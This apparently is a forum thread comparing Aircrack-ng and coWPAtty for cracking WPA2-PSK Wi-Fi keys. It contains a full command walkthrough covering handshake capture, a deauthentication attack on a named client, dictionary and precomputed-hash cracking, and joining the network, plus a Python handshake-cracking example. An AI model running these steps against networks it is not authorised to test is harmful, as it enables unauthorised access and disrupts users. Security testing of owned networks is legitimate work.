[Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3356785
Download video: http://www.mediafire.com/?9dkjbygu238p2uj
What is this?
Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
It shows 4 different cracks, the time taken and speed of the crack (see results).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & Genpmk (Pre-computed hashes)
How does this work?
To crack WPA/WPA2 PSK you need to capture a ‘Handshake’. The best way to get this packet is for the attacker to disconnect a client that is currently connected to the network (if the attacker keeps on repeating this part, it becomes a DoS for the user).
Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, it's just a question of waiting for the dictionary file to be processed.
From here, the attacker can use that key to decrypt the captured data from before, and is now able to ‘read’ it as well as join the network.
If there isn't a connected client - you can't do this. If the network key isn't in the dictionary file - you can't do this.
You can speed up the cracking process by creating pre-calculated hash files (see results - for how much faster!)
Results
*For the table, see the blog post*
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Name: coWPAtty
Version: 4.3
Home Page: http://www.willhackforsushi.com/Cowpatty.html
Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz
Commands:
Code:
# Put the card into monitor mode and find the target network
airmon-ng start wlan0
airodump-ng mon0
# Capture on the AP's channel, writing to output-01.cap
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
# Kick a connected client off so it reconnects and the handshake is captured
aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
# 1. Aircrack-ng, dictionary
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
# 2. Aircrack-ng with airolib-ng pre-computed PMKs (the file 'essid' holds the network name)
airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output-01.cap
# 3. coWPAtty, dictionary
cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
# 4. coWPAtty with genpmk pre-computed hashes
genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
# Join the network with the recovered key and check connectivity
wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1
Notes:
Song: First State - Off the Radar (First State's 808 Clash Mix)
Video length: 08:38
Capture length: 01:14:29
Blog Post: http://g0tmi1k.blogspot.com/2010/02/...rcrack-ng.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html
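The offline step described in the post (capture the handshake, then test each dictionary word) comes down to a handful of hash operations. The following is an added example, not code from g0tmi1k's video or post: it reuses the ESSID, passphrase and MAC addresses from the commands above, but the nonces and the EAPOL frame are constructed. It shows what aircrack-ng and coWPAtty compute for every candidate, and why genpmk / airolib-ng tables help: the expensive PBKDF2 step depends only on the ESSID and the word, so it can be done once and reused, while a table built for one ESSID is useless against another network.

```python
"""
Added example (not from g0tmi1k's post): the per-candidate maths behind
aircrack-ng and coWPAtty, and why a genpmk/airolib-ng PMK table is faster.
The handshake below is constructed; the ESSID, passphrase and MACs come from
the commands in the post.
"""
import hashlib
import hmac
import struct


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    # This is the slow step, and it depends on the SSID only, not on the handshake.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = PTK[0:16] is all that is needed to verify the MIC


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # The 16-byte MIC sits at offset 81 of an EAPOL-Key frame and is zeroed before hashing.
    # Key Info bits 0-2 select the algorithm: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP).
    version = struct.unpack(">H", frame[5:7])[0] & 0x0007
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def pmk_matches(pmk, ap_mac, sta_mac, anonce, snonce, msg2) -> bool:
    # The cheap per-candidate step: derive the KCK, recompute the MIC, compare.
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[81:97])


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Plain dictionary attack (aircrack-ng -w / cowpatty -f): PBKDF2 for every word."""
    for word in wordlist:
        if pmk_matches(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce, msg2):
            return word
    return None


def build_pmk_table(ssid, wordlist):
    """What genpmk / airolib-ng --batch do: pay the PBKDF2 cost once per (SSID, word)."""
    return [(word, pmk_from_passphrase(word, ssid)) for word in wordlist]


def crack_with_table(table, ap_mac, sta_mac, anonce, snonce, msg2):
    """cowpatty -d / aircrack-ng -r: only the cheap PTK/MIC step is left per entry."""
    for word, pmk in table:
        if pmk_matches(pmk, ap_mac, sta_mac, anonce, snonce, msg2):
            return word
    return None


# Constructed sample handshake: MACs and ESSID from the post's commands, nonces made up.
SSID = "g0tmi1k"
AP_MAC = mac("00:24:B2:A0:51:14")
STA_MAC = mac("00:14:17:94:90:0D")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
WORDLIST = ["password", "letmein", "precivilization", "backtrack4", "dictionary"]


def make_msg2(passphrase: str, version: int = 2) -> bytes:
    """Constructed message 2 of the 4-way handshake, carrying the MIC the client would send."""
    key_info = 0x0008 | 0x0100 | version  # Pairwise | Key MIC | descriptor version
    body = (struct.pack(">BHH", 2, key_info, 0) + struct.pack(">Q", 1) + SNONCE
            + b"\x00" * 32          # Key IV, Key RSC, Key ID (all zero in message 2)
            + b"\x00" * 16          # MIC placeholder
            + struct.pack(">H", 0))  # Key Data length (RSN IE omitted in this sample)
    frame = struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X header: version 1, EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


if __name__ == "__main__":
    msg2 = make_msg2("precivilization")
    print("dictionary:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2, WORDLIST))
    table = build_pmk_table(SSID, WORDLIST)
    print("table:", crack_with_table(table, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2))
    # A table is bound to the ESSID it was generated for; one built for another network finds nothing.
    other = build_pmk_table("linksys", WORDLIST)
    print("wrong-ESSID table:", crack_with_table(other, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2))
```

With five words this finishes almost instantly; the speed difference the post measures comes from skipping the 4096 HMAC-SHA1 rounds of `pmk_from_passphrase` per word at crack time, which is exactly what `genpmk -s g0tmi1k` and `airolib-ng --import essid` bake into their tables. It also makes the other caveat concrete: a PMK table is only worth building for an ESSID you expect to meet again (or a very common default name).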
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Thank you my dear, but how can I get a dictionary:(
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
You can find tons of different dictionaries all over the net just do some searching ;)
Remember google is your friend!
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Quote:
Originally Posted by
SAIEF007S
Thank you my dear, but how can I get a dictionary:(
I've posted a few on my blog. The link was in the top post, but in case you didn't see it:
g0tmi1k: [Site News] February Update - ISOs and Dictionaries
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
So how would I use a dictionary I download if I use BackTrack on a live boot CD?
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Quote:
Originally Posted by
canihitdat
So how would I use a dictionary I download if I use BackTrack on a live boot CD?
That's what I would also like to know. If anyone could post a response with a link to a tutorial, that would be great.
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Quote:
Originally Posted by
codehpro
That's what I would also like to know. If anyone could post a response with a link to a tutorial, that would be great.
After downloading a dictionary...
replace: /root/dictionaries/webster-dictionary.txt
with: [Wherever you downloaded the file to!] EXAMPLE: /root/dictionarythatijustdownloaded.dic
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
What CPU did you use to get those results?
If you have a multi-core processor, have you noticed that aircrack-ng uses several cores whereas coWPAtty uses just one core?
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Quote:
Originally Posted by
codehpro
That's what I would also like to know. If anyone could post a response with a link to a tutorial, that would be great.
There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words. If you want more extensive ones, Google them; I did just recently and found a nice supply of them.
As for usage, you should study the man pages of aircrack-ng or the tutorials on their official pages.
Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)
Quote:
Originally Posted by
dareeek
What CPU did you use to get those results?
If you have a multi-core processor, have you noticed that aircrack-ng uses several cores whereas coWPAtty uses just one core?
Not sure. It was a while ago that I did this.
It would have been on my laptop - so nothing higher than a dual core 2GHz (if that!)
Yeah, you're right: coWPAtty only uses one core, whereas aircrack-ng uses more...
Another hint for speed is to split the dictionaries into more parts and run more instances of your cracking utility. (Source)
Quote:
Originally Posted by
CrazyBranch
There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words. If you want more extensive ones, Google them; I did just recently and found a nice supply of them.
As for usage, you should study the man pages of aircrack-ng or the tutorials on their official pages.
I'm also hosting and working on my own collection of wordlists.
I haven't done WiFi pentesting since recording this video. When I get the time, I'll look into it more.